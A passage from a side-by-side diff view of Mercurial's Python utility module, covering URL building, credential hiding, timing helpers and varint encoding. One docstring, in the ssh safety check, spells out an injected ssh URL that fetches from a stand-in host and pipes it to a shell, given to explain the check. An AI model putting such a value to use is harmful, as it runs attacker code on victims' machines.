2899 s += '//'
2900 elif self.scheme and (not self.path or self.path.startswith('/')
2900 elif self.scheme and (not self.path or self.path.startswith('/')
2901 or hasdriveletter(self.path)):
2901 or hasdriveletter(self.path)):
2902 s += '//'
2902 s += '//'
2903 if hasdriveletter(self.path):
2903 if hasdriveletter(self.path):
2904 s += '/'
2904 s += '/'
2905 if self.user:
2905 if self.user:
2906 s += urlreq.quote(self.user, safe=self._safechars)
2906 s += urlreq.quote(self.user, safe=self._safechars)
2907 if self.passwd:
2907 if self.passwd:
2908 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2908 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2909 if self.user or self.passwd:
2909 if self.user or self.passwd:
2910 s += '@'
2910 s += '@'
2911 if self.host:
2911 if self.host:
2912 if not (self.host.startswith('[') and self.host.endswith(']')):
2912 if not (self.host.startswith('[') and self.host.endswith(']')):
2913 s += urlreq.quote(self.host)
2913 s += urlreq.quote(self.host)
2914 else:
2914 else:
2915 s += self.host
2915 s += self.host
2916 if self.port:
2916 if self.port:
2917 s += ':' + urlreq.quote(self.port)
2917 s += ':' + urlreq.quote(self.port)
2918 if self.host:
2918 if self.host:
2919 s += '/'
2919 s += '/'
2920 if self.path:
2920 if self.path:
2921 # TODO: similar to the query string, we should not unescape the
2921 # TODO: similar to the query string, we should not unescape the
2922 # path when we store it, the path might contain '%2f' = '/',
2922 # path when we store it, the path might contain '%2f' = '/',
2923 # which we should *not* escape.
2923 # which we should *not* escape.
2924 s += urlreq.quote(self.path, safe=self._safepchars)
2924 s += urlreq.quote(self.path, safe=self._safepchars)
2925 if self.query:
2925 if self.query:
2926 # we store the query in escaped form.
2926 # we store the query in escaped form.
2927 s += '?' + self.query
2927 s += '?' + self.query
2928 if self.fragment is not None:
2928 if self.fragment is not None:
2929 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2929 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2930 return s
2930 return s
2931
2931
2932 __str__ = encoding.strmethod(__bytes__)
2932 __str__ = encoding.strmethod(__bytes__)
2933
2933
2934 def authinfo(self):
2934 def authinfo(self):
2935 user, passwd = self.user, self.passwd
2935 user, passwd = self.user, self.passwd
2936 try:
2936 try:
2937 self.user, self.passwd = None, None
2937 self.user, self.passwd = None, None
2938 s = bytes(self)
2938 s = bytes(self)
2939 finally:
2939 finally:
2940 self.user, self.passwd = user, passwd
2940 self.user, self.passwd = user, passwd
2941 if not self.user:
2941 if not self.user:
2942 return (s, None)
2942 return (s, None)
2943 # authinfo[1] is passed to urllib2 password manager, and its
2943 # authinfo[1] is passed to urllib2 password manager, and its
2944 # URIs must not contain credentials. The host is passed in the
2944 # URIs must not contain credentials. The host is passed in the
2945 # URIs list because Python < 2.4.3 uses only that to search for
2945 # URIs list because Python < 2.4.3 uses only that to search for
2946 # a password.
2946 # a password.
2947 return (s, (None, (s, self.host),
2947 return (s, (None, (s, self.host),
2948 self.user, self.passwd or ''))
2948 self.user, self.passwd or ''))
2949
2949
2950 def isabs(self):
2950 def isabs(self):
2951 if self.scheme and self.scheme != 'file':
2951 if self.scheme and self.scheme != 'file':
2952 return True # remote URL
2952 return True # remote URL
2953 if hasdriveletter(self.path):
2953 if hasdriveletter(self.path):
2954 return True # absolute for our purposes - can't be joined()
2954 return True # absolute for our purposes - can't be joined()
2955 if self.path.startswith(br'\\'):
2955 if self.path.startswith(br'\\'):
2956 return True # Windows UNC path
2956 return True # Windows UNC path
2957 if self.path.startswith('/'):
2957 if self.path.startswith('/'):
2958 return True # POSIX-style
2958 return True # POSIX-style
2959 return False
2959 return False
2960
2960
2961 def localpath(self):
2961 def localpath(self):
2962 if self.scheme == 'file' or self.scheme == 'bundle':
2962 if self.scheme == 'file' or self.scheme == 'bundle':
2963 path = self.path or '/'
2963 path = self.path or '/'
2964 # For Windows, we need to promote hosts containing drive
2964 # For Windows, we need to promote hosts containing drive
2965 # letters to paths with drive letters.
2965 # letters to paths with drive letters.
2966 if hasdriveletter(self._hostport):
2966 if hasdriveletter(self._hostport):
2967 path = self._hostport + '/' + self.path
2967 path = self._hostport + '/' + self.path
2968 elif (self.host is not None and self.path
2968 elif (self.host is not None and self.path
2969 and not hasdriveletter(path)):
2969 and not hasdriveletter(path)):
2970 path = '/' + path
2970 path = '/' + path
2971 return path
2971 return path
2972 return self._origpath
2972 return self._origpath
2973
2973
2974 def islocal(self):
2974 def islocal(self):
2975 '''whether localpath will return something that posixfile can open'''
2975 '''whether localpath will return something that posixfile can open'''
2976 return (not self.scheme or self.scheme == 'file'
2976 return (not self.scheme or self.scheme == 'file'
2977 or self.scheme == 'bundle')
2977 or self.scheme == 'bundle')
2978
2978
2979 def hasscheme(path):
2979 def hasscheme(path):
2980 return bool(url(path).scheme)
2980 return bool(url(path).scheme)
2981
2981
2982 def hasdriveletter(path):
2982 def hasdriveletter(path):
2983 return path and path[1:2] == ':' and path[0:1].isalpha()
2983 return path and path[1:2] == ':' and path[0:1].isalpha()
2984
2984
2985 def urllocalpath(path):
2985 def urllocalpath(path):
2986 return url(path, parsequery=False, parsefragment=False).localpath()
2986 return url(path, parsequery=False, parsefragment=False).localpath()
2987
2987
2988 def checksafessh(path):
2988 def checksafessh(path):
2989 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2989 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2990
2990
2991 This is a sanity check for ssh urls. ssh will parse the first item as
2991 This is a sanity check for ssh urls. ssh will parse the first item as
2992 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2992 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2993 Let's prevent these potentially exploited urls entirely and warn the
2993 Let's prevent these potentially exploited urls entirely and warn the
2994 user.
2994 user.
2995
2995
2996 Raises an error.Abort when the url is unsafe.
2996 Raises an error.Abort when the url is unsafe.
2997 """
2997 """
2998 path = urlreq.unquote(path)
2998 path = urlreq.unquote(path)
2999 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2999 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3000 raise error.Abort(_('potentially unsafe url: %r') %
3000 raise error.Abort(_('potentially unsafe url: %r') %
3001 (pycompat.bytestr(path),))
3001 (pycompat.bytestr(path),))
3002
3002
3003 def hidepassword(u):
3003 def hidepassword(u):
3004 '''hide user credential in a url string'''
3004 '''hide user credential in a url string'''
3005 u = url(u)
3005 u = url(u)
3006 if u.passwd:
3006 if u.passwd:
3007 u.passwd = '***'
3007 u.passwd = '***'
3008 return bytes(u)
3008 return bytes(u)
3009
3009
3010 def removeauth(u):
3010 def removeauth(u):
3011 '''remove all authentication information from a url string'''
3011 '''remove all authentication information from a url string'''
3012 u = url(u)
3012 u = url(u)
3013 u.user = u.passwd = None
3013 u.user = u.passwd = None
3014 return bytes(u)
3014 return bytes(u)
3015
3015
3016 timecount = unitcountfn(
3016 timecount = unitcountfn(
3017 (1, 1e3, _('%.0f s')),
3017 (1, 1e3, _('%.0f s')),
3018 (100, 1, _('%.1f s')),
3018 (100, 1, _('%.1f s')),
3019 (10, 1, _('%.2f s')),
3019 (10, 1, _('%.2f s')),
3020 (1, 1, _('%.3f s')),
3020 (1, 1, _('%.3f s')),
3021 (100, 0.001, _('%.1f ms')),
3021 (100, 0.001, _('%.1f ms')),
3022 (10, 0.001, _('%.2f ms')),
3022 (10, 0.001, _('%.2f ms')),
3023 (1, 0.001, _('%.3f ms')),
3023 (1, 0.001, _('%.3f ms')),
3024 (100, 0.000001, _('%.1f us')),
3024 (100, 0.000001, _('%.1f us')),
3025 (10, 0.000001, _('%.2f us')),
3025 (10, 0.000001, _('%.2f us')),
3026 (1, 0.000001, _('%.3f us')),
3026 (1, 0.000001, _('%.3f us')),
3027 (100, 0.000000001, _('%.1f ns')),
3027 (100, 0.000000001, _('%.1f ns')),
3028 (10, 0.000000001, _('%.2f ns')),
3028 (10, 0.000000001, _('%.2f ns')),
3029 (1, 0.000000001, _('%.3f ns')),
3029 (1, 0.000000001, _('%.3f ns')),
3030 )
3030 )
3031
3031
3032 @attr.s
3032 @attr.s
3033 class timedcmstats(object):
3033 class timedcmstats(object):
3034 """Stats information produced by the timedcm context manager on entering."""
3034 """Stats information produced by the timedcm context manager on entering."""
3035
3035
3036 # the starting value of the timer as a float (meaning and resulution is
3036 # the starting value of the timer as a float (meaning and resulution is
3037 # platform dependent, see util.timer)
3037 # platform dependent, see util.timer)
3038 start = attr.ib(default=attr.Factory(lambda: timer()))
3038 start = attr.ib(default=attr.Factory(lambda: timer()))
3039 # the number of seconds as a floating point value; starts at 0, updated when
3039 # the number of seconds as a floating point value; starts at 0, updated when
3040 # the context is exited.
3040 # the context is exited.
3041 elapsed = attr.ib(default=0)
3041 elapsed = attr.ib(default=0)
3042 # the number of nested timedcm context managers.
3042 # the number of nested timedcm context managers.
3043 level = attr.ib(default=1)
3043 level = attr.ib(default=1)
3044
3044
3045 def __bytes__(self):
3045 def __bytes__(self):
3046 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3046 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3047
3047
3048 __str__ = encoding.strmethod(__bytes__)
3048 __str__ = encoding.strmethod(__bytes__)
3049
3049
3050 @contextlib.contextmanager
3050 @contextlib.contextmanager
3051 def timedcm(whencefmt, *whenceargs):
3051 def timedcm(whencefmt, *whenceargs):
3052 """A context manager that produces timing information for a given context.
3052 """A context manager that produces timing information for a given context.
3053
3053
3054 On entering a timedcmstats instance is produced.
3054 On entering a timedcmstats instance is produced.
3055
3055
3056 This context manager is reentrant.
3056 This context manager is reentrant.
3057
3057
3058 """
3058 """
3059 # track nested context managers
3059 # track nested context managers
3060 timedcm._nested += 1
3060 timedcm._nested += 1
3061 timing_stats = timedcmstats(level=timedcm._nested)
3061 timing_stats = timedcmstats(level=timedcm._nested)
3062 try:
3062 try:
3063 with tracing.log(whencefmt, *whenceargs):
3063 with tracing.log(whencefmt, *whenceargs):
3064 yield timing_stats
3064 yield timing_stats
3065 finally:
3065 finally:
3066 timing_stats.elapsed = timer() - timing_stats.start
3066 timing_stats.elapsed = timer() - timing_stats.start
3067 timedcm._nested -= 1
3067 timedcm._nested -= 1
3068
3068
3069 timedcm._nested = 0
3069 timedcm._nested = 0
3070
3070
3071 def timed(func):
3071 def timed(func):
3072 '''Report the execution time of a function call to stderr.
3072 '''Report the execution time of a function call to stderr.
3073
3073
3074 During development, use as a decorator when you need to measure
3074 During development, use as a decorator when you need to measure
3075 the cost of a function, e.g. as follows:
3075 the cost of a function, e.g. as follows:
3076
3076
3077 @util.timed
3077 @util.timed
3078 def foo(a, b, c):
3078 def foo(a, b, c):
3079 pass
3079 pass
3080 '''
3080 '''
3081
3081
3082 def wrapper(*args, **kwargs):
3082 def wrapper(*args, **kwargs):
3083 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3083 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3084 result = func(*args, **kwargs)
3084 result = func(*args, **kwargs)
3085 stderr = procutil.stderr
3085 stderr = procutil.stderr
3086 stderr.write('%s%s: %s\n' % (
3086 stderr.write('%s%s: %s\n' % (
3087 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3087 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3088 time_stats))
3088 time_stats))
3089 return result
3089 return result
3090 return wrapper
3090 return wrapper
3091
3091
3092 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3092 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3093 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3093 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3094
3094
3095 def sizetoint(s):
3095 def sizetoint(s):
3096 '''Convert a space specifier to a byte count.
3096 '''Convert a space specifier to a byte count.
3097
3097
3098 >>> sizetoint(b'30')
3098 >>> sizetoint(b'30')
3099 30
3099 30
3100 >>> sizetoint(b'2.2kb')
3100 >>> sizetoint(b'2.2kb')
3101 2252
3101 2252
3102 >>> sizetoint(b'6M')
3102 >>> sizetoint(b'6M')
3103 6291456
3103 6291456
3104 '''
3104 '''
3105 t = s.strip().lower()
3105 t = s.strip().lower()
3106 try:
3106 try:
3107 for k, u in _sizeunits:
3107 for k, u in _sizeunits:
3108 if t.endswith(k):
3108 if t.endswith(k):
3109 return int(float(t[:-len(k)]) * u)
3109 return int(float(t[:-len(k)]) * u)
3110 return int(t)
3110 return int(t)
3111 except ValueError:
3111 except ValueError:
3112 raise error.ParseError(_("couldn't parse size: %s") % s)
3112 raise error.ParseError(_("couldn't parse size: %s") % s)
3113
3113
3114 class hooks(object):
3114 class hooks(object):
3115 '''A collection of hook functions that can be used to extend a
3115 '''A collection of hook functions that can be used to extend a
3116 function's behavior. Hooks are called in lexicographic order,
3116 function's behavior. Hooks are called in lexicographic order,
3117 based on the names of their sources.'''
3117 based on the names of their sources.'''
3118
3118
3119 def __init__(self):
3119 def __init__(self):
3120 self._hooks = []
3120 self._hooks = []
3121
3121
3122 def add(self, source, hook):
3122 def add(self, source, hook):
3123 self._hooks.append((source, hook))
3123 self._hooks.append((source, hook))
3124
3124
3125 def __call__(self, *args):
3125 def __call__(self, *args):
3126 self._hooks.sort(key=lambda x: x[0])
3126 self._hooks.sort(key=lambda x: x[0])
3127 results = []
3127 results = []
3128 for source, hook in self._hooks:
3128 for source, hook in self._hooks:
3129 results.append(hook(*args))
3129 results.append(hook(*args))
3130 return results
3130 return results
3131
3131
3132 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3132 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3133 '''Yields lines for a nicely formatted stacktrace.
3133 '''Yields lines for a nicely formatted stacktrace.
3134 Skips the 'skip' last entries, then return the last 'depth' entries.
3134 Skips the 'skip' last entries, then return the last 'depth' entries.
3135 Each file+linenumber is formatted according to fileline.
3135 Each file+linenumber is formatted according to fileline.
3136 Each line is formatted according to line.
3136 Each line is formatted according to line.
3137 If line is None, it yields:
3137 If line is None, it yields:
3138 length of longest filepath+line number,
3138 length of longest filepath+line number,
3139 filepath+linenumber,
3139 filepath+linenumber,
3140 function
3140 function
3141
3141
3142 Not be used in production code but very convenient while developing.
3142 Not be used in production code but very convenient while developing.
3143 '''
3143 '''
3144 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3144 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3145 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3145 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3146 ][-depth:]
3146 ][-depth:]
3147 if entries:
3147 if entries:
3148 fnmax = max(len(entry[0]) for entry in entries)
3148 fnmax = max(len(entry[0]) for entry in entries)
3149 for fnln, func in entries:
3149 for fnln, func in entries:
3150 if line is None:
3150 if line is None:
3151 yield (fnmax, fnln, func)
3151 yield (fnmax, fnln, func)
3152 else:
3152 else:
3153 yield line % (fnmax, fnln, func)
3153 yield line % (fnmax, fnln, func)
3154
3154
3155 def debugstacktrace(msg='stacktrace', skip=0,
3155 def debugstacktrace(msg='stacktrace', skip=0,
3156 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3156 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3157 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3157 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3158 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3158 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3159 By default it will flush stdout first.
3159 By default it will flush stdout first.
3160 It can be used everywhere and intentionally does not require an ui object.
3160 It can be used everywhere and intentionally does not require an ui object.
3161 Not be used in production code but very convenient while developing.
3161 Not be used in production code but very convenient while developing.
3162 '''
3162 '''
3163 if otherf:
3163 if otherf:
3164 otherf.flush()
3164 otherf.flush()
3165 f.write('%s at:\n' % msg.rstrip())
3165 f.write('%s at:\n' % msg.rstrip())
3166 for line in getstackframes(skip + 1, depth=depth):
3166 for line in getstackframes(skip + 1, depth=depth):
3167 f.write(line)
3167 f.write(line)
3168 f.flush()
3168 f.flush()
3169
3169
3170 class dirs(object):
3170 class dirs(object):
3171 '''a multiset of directory names from a dirstate or manifest'''
3171 '''a multiset of directory names from a dirstate or manifest'''
3172
3172
3173 def __init__(self, map, skip=None):
3173 def __init__(self, map, skip=None):
3174 self._dirs = {}
3174 self._dirs = {}
3175 addpath = self.addpath
3175 addpath = self.addpath
3176 if isinstance(map, dict) and skip is not None:
3176 if isinstance(map, dict) and skip is not None:
3177 for f, s in map.iteritems():
3177 for f, s in map.iteritems():
3178 if s[0] != skip:
3178 if s[0] != skip:
3179 addpath(f)
3179 addpath(f)
3180 elif skip is not None:
3180 elif skip is not None:
3181 raise error.ProgrammingError("skip character is only supported "
3181 raise error.ProgrammingError("skip character is only supported "
3182 "with a dict source")
3182 "with a dict source")
3183 else:
3183 else:
3184 for f in map:
3184 for f in map:
3185 addpath(f)
3185 addpath(f)
3186
3186
3187 def addpath(self, path):
3187 def addpath(self, path):
3188 dirs = self._dirs
3188 dirs = self._dirs
3189 for base in finddirs(path):
3189 for base in finddirs(path):
3190 if base in dirs:
3190 if base in dirs:
3191 dirs[base] += 1
3191 dirs[base] += 1
3192 return
3192 return
3193 dirs[base] = 1
3193 dirs[base] = 1
3194
3194
3195 def delpath(self, path):
3195 def delpath(self, path):
3196 dirs = self._dirs
3196 dirs = self._dirs
3197 for base in finddirs(path):
3197 for base in finddirs(path):
3198 if dirs[base] > 1:
3198 if dirs[base] > 1:
3199 dirs[base] -= 1
3199 dirs[base] -= 1
3200 return
3200 return
3201 del dirs[base]
3201 del dirs[base]
3202
3202
3203 def __iter__(self):
3203 def __iter__(self):
3204 return iter(self._dirs)
3204 return iter(self._dirs)
3205
3205
3206 def __contains__(self, d):
3206 def __contains__(self, d):
3207 return d in self._dirs
3207 return d in self._dirs
3208
3208
3209 if safehasattr(parsers, 'dirs'):
3209 if safehasattr(parsers, 'dirs'):
3210 dirs = parsers.dirs
3210 dirs = parsers.dirs
3211
3211
3212 if rustdirs is not None:
3212 if rustdirs is not None:
3213 dirs = rustdirs
3213 dirs = rustdirs
3214
3214
3215 def finddirs(path):
3215 def finddirs(path):
3216 pos = path.rfind('/')
3216 pos = path.rfind('/')
3217 while pos != -1:
3217 while pos != -1:
3218 yield path[:pos]
3218 yield path[:pos]
3219 pos = path.rfind('/', 0, pos)
3219 pos = path.rfind('/', 0, pos)
3220 yield ''
3220 yield ''
3221
3221
3222
3222
3223 # convenient shortcut
3223 # convenient shortcut
3224 dst = debugstacktrace
3224 dst = debugstacktrace
3225
3225
3226 def safename(f, tag, ctx, others=None):
3226 def safename(f, tag, ctx, others=None):
3227 """
3227 """
3228 Generate a name that it is safe to rename f to in the given context.
3228 Generate a name that it is safe to rename f to in the given context.
3229
3229
3230 f: filename to rename
3230 f: filename to rename
3231 tag: a string tag that will be included in the new name
3231 tag: a string tag that will be included in the new name
3232 ctx: a context, in which the new name must not exist
3232 ctx: a context, in which the new name must not exist
3233 others: a set of other filenames that the new name must not be in
3233 others: a set of other filenames that the new name must not be in
3234
3234
3235 Returns a file name of the form oldname~tag[~number] which does not exist
3235 Returns a file name of the form oldname~tag[~number] which does not exist
3236 in the provided context and is not in the set of other names.
3236 in the provided context and is not in the set of other names.
3237 """
3237 """
3238 if others is None:
3238 if others is None:
3239 others = set()
3239 others = set()
3240
3240
3241 fn = '%s~%s' % (f, tag)
3241 fn = '%s~%s' % (f, tag)
3242 if fn not in ctx and fn not in others:
3242 if fn not in ctx and fn not in others:
3243 return fn
3243 return fn
3244 for n in itertools.count(1):
3244 for n in itertools.count(1):
3245 fn = '%s~%s~%s' % (f, tag, n)
3245 fn = '%s~%s~%s' % (f, tag, n)
3246 if fn not in ctx and fn not in others:
3246 if fn not in ctx and fn not in others:
3247 return fn
3247 return fn
3248
3248
3249 def readexactly(stream, n):
3249 def readexactly(stream, n):
3250 '''read n bytes from stream.read and abort if less was available'''
3250 '''read n bytes from stream.read and abort if less was available'''
3251 s = stream.read(n)
3251 s = stream.read(n)
3252 if len(s) < n:
3252 if len(s) < n:
3253 raise error.Abort(_("stream ended unexpectedly"
3253 raise error.Abort(_("stream ended unexpectedly"
3254 " (got %d bytes, expected %d)")
3254 " (got %d bytes, expected %d)")
3255 % (len(s), n))
3255 % (len(s), n))
3256 return s
3256 return s
3257
3257
3258 def uvarintencode(value):
3258 def uvarintencode(value):
3259 """Encode an unsigned integer value to a varint.
3259 """Encode an unsigned integer value to a varint.
3260
3260
3261 A varint is a variable length integer of 1 or more bytes. Each byte
3261 A varint is a variable length integer of 1 or more bytes. Each byte
3262 except the last has the most significant bit set. The lower 7 bits of
3262 except the last has the most significant bit set. The lower 7 bits of
3263 each byte store the 2's complement representation, least significant group
3263 each byte store the 2's complement representation, least significant group
3264 first.
3264 first.
3265
3265
3266 >>> uvarintencode(0)
3266 >>> uvarintencode(0)
3267 '\\x00'
3267 '\\x00'
3268 >>> uvarintencode(1)
3268 >>> uvarintencode(1)
3269 '\\x01'
3269 '\\x01'
3270 >>> uvarintencode(127)
3270 >>> uvarintencode(127)
3271 '\\x7f'
3271 '\\x7f'
3272 >>> uvarintencode(1337)
3272 >>> uvarintencode(1337)
3273 '\\xb9\\n'
3273 '\\xb9\\n'
3274 >>> uvarintencode(65536)
3274 >>> uvarintencode(65536)
3275 '\\x80\\x80\\x04'
3275 '\\x80\\x80\\x04'
3276 >>> uvarintencode(-1)
3276 >>> uvarintencode(-1)
3277 Traceback (most recent call last):
3277 Traceback (most recent call last):
3278 ...
3278 ...
3279 ProgrammingError: negative value for uvarint: -1
3279 ProgrammingError: negative value for uvarint: -1
3280 """
3280 """
3281 if value < 0:
3281 if value < 0:
3282 raise error.ProgrammingError('negative value for uvarint: %d'
3282 raise error.ProgrammingError('negative value for uvarint: %d'
3283 % value)
3283 % value)
3284 bits = value & 0x7f
3284 bits = value & 0x7f
3285 value >>= 7
3285 value >>= 7
3286 bytes = []
3286 bytes = []
3287 while value:
3287 while value:
3288 bytes.append(pycompat.bytechr(0x80 | bits))
3288 bytes.append(pycompat.bytechr(0x80 | bits))
3289 bits = value & 0x7f
3289 bits = value & 0x7f
3290 value >>= 7
3290 value >>= 7
3291 bytes.append(pycompat.bytechr(bits))
3291 bytes.append(pycompat.bytechr(bits))
3292
3292
3293 return ''.join(bytes)
3293 return ''.join(bytes)
3294
3294
3295 def uvarintdecodestream(fh):
3295 def uvarintdecodestream(fh):
3296 """Decode an unsigned variable length integer from a stream.
3296 """Decode an unsigned variable length integer from a stream.
3297
3297
3298 The passed argument is anything that has a ``.read(N)`` method.
3298 The passed argument is anything that has a ``.read(N)`` method.
3299
3299
3300 >>> try:
3300 >>> try:
3301 ... from StringIO import StringIO as BytesIO
3301 ... from StringIO import StringIO as BytesIO
3302 ... except ImportError:
3302 ... except ImportError:
3303 ... from io import BytesIO
3303 ... from io import BytesIO
3304 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3304 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3305 0
3305 0
3306 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3306 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3307 1
3307 1
3308 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3308 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3309 127
3309 127
3310 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3310 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3311 1337
3311 1337
3312 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3312 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3313 65536
3313 65536
3314 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3314 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3315 Traceback (most recent call last):
3315 Traceback (most recent call last):
3316 ...
3316 ...
3317 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3317 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3318 """
3318 """
3319 result = 0
3319 result = 0
3320 shift = 0
3320 shift = 0
3321 while True:
3321 while True:
3322 byte = ord(readexactly(fh, 1))
3322 byte = ord(readexactly(fh, 1))
3323 result |= ((byte & 0x7f) << shift)
3323 result |= ((byte & 0x7f) << shift)
3324 if not (byte & 0x80):
3324 if not (byte & 0x80):
3325 return result
3325 return result
3326 shift += 7
3326 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now